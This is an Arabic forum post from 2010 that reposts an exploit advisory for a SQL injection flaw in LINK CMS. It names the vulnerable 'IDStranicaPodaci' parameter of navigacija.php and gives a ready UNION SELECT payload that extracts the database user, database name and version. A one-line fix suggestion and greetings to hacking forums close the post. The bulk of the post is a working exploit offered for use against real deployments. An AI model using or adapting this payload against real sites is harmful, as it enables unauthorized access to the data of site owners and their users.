عرض مشاركة واحدة
قديم 08-27-2010, 02:39 PM   رقم المشاركة : 25 (permalink)
معلومات العضو
Master vbspiders
 
الصورة الرمزية Master vbspiders
 

 

 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post LINK CMS SQL Injection Vulnerability


كود PHP:
# Exploit Title: LINK CMS.SQL Injection Vulnerability
# Date: 2010-08-23
# Author: hacker@sr.gov.yu
# Software Link:
http://www.link-softsolutions.com/SoftLink-Content-Management-System---CMS_20_1
# Version: n/a
 
 
####################################################################
.:. Author hacker@sr.gov.yu
.:. Contacthacker@evilzone.orghacker@sr.gov.yu(MSN)
.:. 
Home www.evilzone.orgwww.pentesting-rs.org
.:. Script LINK CMS
.:. Bug Type Sql Injection
.:. RiskHigh
.:. Tested on Windows Linux
 
####################################################################
 
===[ Exploit ]===
 
.:. 
It was found that LINK CMS does not validate properly the "IDStranicaPodaci"
parameter value.
 
http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]
 
===[ Example ]===
 
http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63
UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
 
 
===[ 
Solution ]===
 
.:. 
Input validation of "IDStranicaPodaci" parameter should be corrected.
 
 
Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!
Pozdrav za sve iz Srbije!!! :-))) 
التوقيع

^_^



 

   

رد مع اقتباس